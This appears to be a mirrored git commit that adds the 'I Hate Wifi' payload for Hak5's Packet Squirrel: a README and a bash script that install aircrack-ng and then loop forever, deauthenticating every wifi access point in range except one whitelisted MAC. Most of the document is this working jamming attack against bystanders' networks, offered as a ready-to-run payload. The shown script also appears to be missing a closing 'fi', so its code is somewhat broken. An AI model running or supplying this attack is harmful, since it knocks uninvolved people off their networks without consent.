mirror of
https://github.com/hak5/packetsquirrel-payloads.git
synced 2025-12-19 09:48:47 +00:00
Update repos for Packet Squirrel Mk 2 release
This commit is contained in:
26
legacy-mk1/payloads/library/general/I-Hate-Wifi/README.md
Normal file
26
legacy-mk1/payloads/library/general/I-Hate-Wifi/README.md
Normal file
@@ -0,0 +1,26 @@
|
||||
| | |
|
||||
|:----------------|:---------------------------------------------------------------------------------------------------|
|
||||
| **Title** |I Hate Wifi |
|
||||
| **Description** | Deauths all wifi clients in the area with option to exclude your own . |
|
||||
**Author** | TheDragonkeeper |
|
||||
| **Version** | 1.0 |
|
||||
| **Category** | General |
|
||||
| **Target** | Any |
|
||||
|
||||
| Meaning | Color | Description |
|
||||
|:----------|:-----------------:|:----------------------------|
|
||||
| Waiting: | Blinking yellow | Waiting on network - getting requirements |
|
||||
| Failed: | Flashing Red | Failed to get package |
|
||||
| Scanning: | Green | Scanning for Aps |
|
||||
| Attacking: | Red | Deauthing targets |
|
||||
| Done: | Blue | Sleeping |
|
||||
|
||||
| Requires |
|
||||
|:----------|
|
||||
| Aircrack-ng |
|
||||
| usb wifi dongle |
|
||||
| Fw 1.1 + |
|
||||
|
||||
| Options | Line | Result |
|
||||
|:----------|:----------|:----------|
|
||||
| YOUR_AP_MAC='' | 37 |Add your mac address to exclude your AP from attack |
|
||||
42
legacy-mk1/payloads/library/general/I-Hate-Wifi/payload.sh
Executable file
42
legacy-mk1/payloads/library/general/I-Hate-Wifi/payload.sh
Executable file
@@ -0,0 +1,42 @@
|
||||
#!/bin/bash
|
||||
|
||||
# This payload is for the original Packet Squirrel. It may not work on
|
||||
# the Packet Squirrel Mark II
|
||||
|
||||
function scan() {
|
||||
LED G
|
||||
ifconfig wlan0 down
|
||||
iwconfig wlan0 mode managed
|
||||
ifconfig wlan0 up
|
||||
AP_LIST=$(iwlist wlan0 scan | grep Address | awk '{ print $5 }')
|
||||
}
|
||||
|
||||
function attack() {
|
||||
ifconfig wlan0 down
|
||||
iwconfig wlan0 mode monitor
|
||||
ifconfig wlan0 up
|
||||
LED R
|
||||
for a in $AP_LIST
|
||||
do
|
||||
if [ $a != $YOUR_AP_MAC ]; then
|
||||
aireplay-ng -0 20 -a $a wlan0
|
||||
fi
|
||||
done
|
||||
LED B
|
||||
sleep 10
|
||||
scan
|
||||
attack
|
||||
}
|
||||
|
||||
if [ ! -f '/usr/sbin/aireplay-ng' ] ; then
|
||||
LED STAGE1
|
||||
NETMODE NAT
|
||||
until ping -c 1 8.8.8.8 >/dev/null ; do : ; done
|
||||
opkg install aircrack-ng || LED FAIL
|
||||
|
||||
LED SETUP
|
||||
AP_LIST=''
|
||||
############ You can change this Variable to allow your AP to not be targeted
|
||||
YOUR_AP_MAC='00:11:22:00:11:22'
|
||||
scan
|
||||
attack
|
||||
Reference in New Issue
Block a user